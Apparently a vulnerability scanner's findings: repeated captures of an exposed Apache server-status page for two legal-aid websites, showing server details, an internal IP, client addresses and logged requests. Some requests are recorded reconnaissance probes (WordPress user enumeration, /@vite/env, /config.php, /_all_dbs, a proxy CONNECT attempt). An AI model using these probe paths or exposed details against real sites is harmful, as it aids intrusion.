5.95160200.00.0010883.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-577-0/0/635060. 23.76160300.00.0010379.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-57726340/4/603116_ 0.8716022630.00.269793.93 18.68.41.53http/1.1atlantalegalaid.org:8080GET /config.php HTTP/1.1 9-577323580/69/583212_ 12.46162710.04.009205.26 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-577-0/0/514105. 0.34160000.00.008744.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-57726440/6/478455_ 1.06171800.00.487892.00 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 12-577323740/45/414903_ 8.3415522590.02.436592.83 146.70.212.80http/1.1 13-577-0/0/328727. 0.46159900.00.004786.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-5773238523/69/289439W 7.760026.22.074305.00 130.176.208.143http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 15-576-0/0/265212. 0.0013635000.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.641703313240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.0021825800.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.0021825600.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.0021825500.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0029222800.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0029222600.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0029222500.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0029222700.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.342567322620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0088047900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00211163600.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00211163500.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00211163400.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00211163200.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00211163300.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00211163100.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82856331300.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00863471100.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15853283200.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0685511316620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23855113100.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00863474600.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00863474400.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32855113110080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00863474500.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00863474300.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00863474200.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00863474100.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00863474000.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00863473900.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001322707800.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001322707700.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001322707600.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001322707500.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001322707400.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001322707300.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001322707200.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001322707100.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001322707000.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001322706900.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001322706800.00.00294.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS *
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979059926e8
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 07-Nov-2025 10:21:52 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 578 Parent Server MPM Generation: 577 Server uptime: 576 days 17 hours 27 minutes 19 seconds Server load: 0.00 0.02 0.00 Total accesses: 13753406 - Total Traffic: 195.5 GB CPU Usage: u362.34 s32.63 cu0 cs0 - .000793% CPU load .276 requests/sec - 4212 B/second - 14.9 kB/request 1 requests currently being processed, 8 idle workers ___W_____....................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-577276850/88/812018_ 13.342651500.03.4013448.56 70.132.4.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-577278180/28/788939_ 5.742942600.01.9513057.54 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/graphql HTTP/1.1 2-577275320/84/757369_ 15.002832580.03.4612917.99 70.132.4.80http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 3-5772753723/106/739433W 12.930026.23.7012388.68 130.176.208.143http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 4-577279500/28/719848_ 7.782792670.01.5611868.91 70.132.4.80http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 5-577275310/31/699280_ 8.73452710.02.2611547.86 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 6-577275420/75/659981_ 12.89132710.02.3610878.82 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-577275470/58/634995_ 12.402932720.03.3910376.73 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 8-577282040/13/603039_ 4.792942590.01.159791.56 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 9-576-0/0/583143. 7.69142106340.00.009201.26 70.132.4.80http/1.1events.atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 10-576-0/0/514087. 7.10142106410.00.008744.05 70.132.4.80http/1.1events.atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 11-576-0/0/478435. 0.002557200.00.007891.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-576-0/0/414858. 7.162557500.00.006590.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-576-0/0/328718. 10.542557400.00.004786.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-576-0/0/289370. 0.006663200.00.004302.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-576-0/0/265212. 0.006662800.00.003777.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-575-0/0/230461. 1.641006103240.00.003442.34 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-575-0/0/167581. 0.0014853700.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-575-0/0/145436. 0.0014853500.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-575-0/0/137595. 0.0014853400.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.0022250700.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.0022250500.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.0022250400.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.0022250600.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.341870102620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0081075800.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00204191500.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00204191400.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00204191300.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00204191100.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00204191200.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00204191000.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82849359200.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00856499000.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15846311100.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0684814106620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23848141000.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00856502500.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00856502300.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32848141010080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00856502400.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00856502200.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00856502100.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00856502000.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00856501900.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00856501800.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001315735700.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001315735600.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001315735500.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001315735400.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001315735300.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001315735200.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001315735100.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001315735000.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001315734900.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001315734800.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97913067081
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 05-Nov-2025 07:03:23 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 576 Parent Server MPM Generation: 575 Server uptime: 574 days 14 hours 8 minutes 49 seconds Server load: 0.00 0.00 0.00 Total accesses: 13750088 - Total Traffic: 195.4 GB CPU Usage: u293.04 s25.43 cu0 cs0 - .000642% CPU load .277 requests/sec - 4225 B/second - 14.9 kB/request 1 requests currently being processed, 5 idle workers ___._W_......................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-575123010/1/811699_ 0.00101810.00.4013436.97 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-575123060/0/788764_ 11.8123012680.00.0013049.46 130.176.208.143http/1.1intranet.atlantalegalaid.org:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-575130600/0/757044_ 5.151100.00.0012906.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-574-0/0/739132. 2.6323012500.00.0012377.30 66.132.153.134http/1.1atlantalegalaid.org:8080\x16\x03\x01 4-575123000/1/719589_ 0.00111810.00.2911862.02 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-5751231123/23/698970W 0.000026.20.0311539.69 130.176.208.143http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 6-575123120/0/659672_ 1.57230100.00.0010860.68 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-574-0/0/634685. 2.1823011490.00.0010367.43 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762320609.760462045669555 8-574-0/0/602840. 1.66230110.00.009787.43 66.132.153.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 9-574-0/0/582999. 3.6323014060.00.009197.86 18.68.37.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-574-0/0/514007. 0.003780500.00.008742.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-574-0/0/478407. 6.983779200.00.007890.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-574-0/0/414769. 5.883777800.00.006588.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-574-0/0/328441. 0.003780400.00.004782.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-574-0/0/289362. 5.113779300.00.004302.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-574-0/0/265129. 0.003780200.00.003777.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-574-0/0/230362. 4.633779100.00.003432.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-574-0/0/167580. 0.003780000.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-574-0/0/145435. 0.003779900.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-574-0/0/137594. 0.003779800.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.003779700.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.003779500.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.003779400.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.003779600.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.3423012620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0062604900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00185720500.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00185720400.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00185720300.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00185720100.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00185720200.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00185720000.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82830888300.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00838028000.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15827840100.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0682967006620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23829670000.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00838031500.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00838031300.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32829670010080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00838031400.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00838031200.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00838031100.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00838031000.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00838030900.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00838030800.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001297264700.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001297264600.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001297264500.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001297264400.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001297264300.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001297264200.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001297264100.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001297264000.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001297263900.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001297263800.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97945081de8
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 03-Nov-2025 10:50:45 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 574 Parent Server MPM Generation: 573 Server uptime: 572 days 17 hours 56 minutes 12 seconds Server load: 0.00 0.00 0.00 Total accesses: 13747755 - Total Traffic: 195.3 GB CPU Usage: u284.02 s24.63 cu0 cs0 - .000624% CPU load .278 requests/sec - 4236 B/second - 14.9 kB/request 1 requests currently being processed, 8 idle workers _____..._.W._....._............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-573296960/18/811457_ 4.4815022600.00.9213430.79 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 1-573296410/49/788436_ 2.6415152590.00.8913044.21 70.132.4.80http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 2-573304210/5/756790_ 0.8191820.00.7212889.84 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-573304300/17/738892_ 3.2415132600.00.9812363.45 70.132.4.80http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 4-573304370/9/719428_ 0.8855910.00.2411848.15 3.172.73.43http/1.1elearning.alas.org:8080GET /lib/javascript.php/1564020885/lib/javascript-static.js HTT 5-572-0/0/698872. 1.543045900.00.0011537.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-572-0/0/659559. 0.001594300.00.0010858.25 173.239.240.9http/1.1 7-572-0/0/634623. 4.153046200.00.0010365.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-573296300/7/602680_ 0.5682720.00.939783.80 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 9-572-0/0/582867. 7.023046700.00.009184.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-5732962923/37/513903W 3.430026.10.508729.29 130.176.208.143http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 11-572-0/0/478315. 0.151594300.00.007888.19 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-573296350/13/414641_ 3.2215112570.00.626565.27 70.132.4.80http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 13-572-0/0/328373. 0.003046100.00.004780.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-572-0/0/289321. 0.003046000.00.004301.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-572-0/0/265107. 0.003046300.00.003775.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-572-0/0/230322. 4.623046600.00.003431.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-572-0/0/167577. 3.563046500.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-573296360/10/145428_ 2.4515021470.00.332064.19 70.132.4.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-572-0/0/137591. 0.001594300.00.002103.38 173.249.217.7http/1.1 20-571-0/0/128255. 0.0017698800.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-571-0/0/116726. 0.0017698700.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0046689500.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0046689200.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0046689400.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0046689100.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00169804800.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00169804700.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00169804600.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00169804400.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00169804500.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00169804300.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82814972500.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00822112300.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15811924300.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0681375436620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23813754300.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00822115800.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00822115600.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32813754310080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00822115700.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00822115500.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00822115400.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00822115300.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00822115200.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00822115100.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001281348900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001281348800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 